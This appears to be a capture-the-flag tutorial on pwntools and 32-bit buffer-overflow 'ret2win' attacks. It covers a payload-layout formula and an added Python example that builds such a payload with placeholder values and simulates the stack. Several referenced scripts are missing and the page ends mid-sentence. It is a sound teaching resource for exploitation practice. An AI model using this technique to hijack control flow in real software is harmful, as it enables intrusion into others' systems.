

pwntools and Baby buffer overflows

OK time to start hacking. Here are today's goals:


pwntools is a Python library that acts as a Swiss Army knife for pwning.

If you can run the line from pwn import * in a Python session, you're good to go.

If not then follow the instructions at:

Also, our pwndocker instructions have pwntools working already.

Here is a random pwntools script from a live CTF problem:

Here is a more useful collection of utilities I find myself using often when hacking:

Baby buffer overflow

OK we get the basic idea of what we need to do right?

In these problems the coder lets us write more than we should into a fixed amount of space.

It looks something like this:

This is the second problem in the zero-to-hero sequence.

Let's solve it together (the video will walk through more). I took the time to host it at: nc 11986

Hackers don't call... they jump in

TLDR: payload=b"A"*offset + p32(win_ADDR) + p32(mysteryhere) + p32(argument1) + p32(argument2)

Here's the normal calling convention for 32-bit:

  1. push arg2
  2. push arg1
  3. call subroutine (push the return address, EIP, then jmp)
  4. push old_ebp
  5. do stuff here
  6. pop old_ebp
  7. ret (pop the return address into EIP)

Now suppose you are going to buffer overflow:

When you JUMP into a win function there is no pushing of the return address...

BUT the win function still acts like there should be a return address on the stack...

SO all of your arguments are shifted by one address when hacking in this way.
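Here is an added example (not from the original lesson or the zero-to-hero binary) that shows why that "mystery" slot is needed. It re-implements p32/u32 with struct so it runs without pwntools, builds the payload in the exact TLDR layout, and then models what the stack looks like from the win function's point of view once the overflowed function executes ret. The offset (44) and the win address (0x080491e2) are constructed placeholder values; on a real problem you would take them from the binary.

```python
import struct

# p32/u32 stand-ins for the pwntools helpers: little-endian 32-bit pack/unpack
# (assumption: a 32-bit x86 target, as in the lesson).
def p32(value):
    return struct.pack("<I", value & 0xFFFFFFFF)

def u32(data):
    return struct.unpack("<I", data[:4])[0]

# Constructed placeholder values, not taken from any real binary.
OFFSET = 44            # bytes from the start of the buffer to the saved return address
WIN_ADDR = 0x080491E2  # address of win()
MYSTERY = 0xDEADBEEF   # the "mysteryhere" slot: fake return address win() will see

def build_ret2win_payload(offset, win_addr, fake_ret, args):
    """Layout from the TLDR line: padding, win address, one fake return slot, then the args."""
    payload = b"A" * offset + p32(win_addr) + p32(fake_ret)
    for a in args:
        payload += p32(a)
    return payload

def simulate_ret_into_win(payload, offset):
    """Model the stack at the moment the overflowed function executes `ret`.

    `ret` pops the saved return address (now win_addr) into EIP and ESP moves
    up one slot. Nobody pushed a return address for win(), so win() treats the
    next slot as its return address and reads arg1 from [esp+4], arg2 from
    [esp+8], ... which is the "shifted by one" effect from the text.
    """
    stack = payload[offset:]
    if len(stack) % 4 != 0:
        raise ValueError("stack region is not 4-byte aligned")
    words = [u32(stack[i:i + 4]) for i in range(0, len(stack), 4)]
    eip = words[0]          # popped by ret
    frame = words[1:]       # what win() sees starting at esp
    return {
        "eip": eip,
        "return_address_seen_by_win": frame[0],
        "args_seen_by_win": frame[1:],
    }

def correct_layout():
    return simulate_ret_into_win(
        build_ret2win_payload(OFFSET, WIN_ADDR, MYSTERY, [1, 2]), OFFSET)

def forgot_mystery_slot():
    # The common mistake: win address followed directly by the arguments.
    # win() now consumes arg1 as its return address and sees arg2 as arg1.
    bad = b"A" * OFFSET + p32(WIN_ADDR) + p32(1) + p32(2)
    return simulate_ret_into_win(bad, OFFSET)

if __name__ == "__main__":
    print("correct layout:", correct_layout())
    print("missing slot:  ", forgot_mystery_slot())
```

Comparing the two dictionaries makes the shift concrete: with the mystery slot in place win() sees args [1, 2]; without it, win() sees 1 as its return address and only [2] as arguments.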

As pseudo-instructions: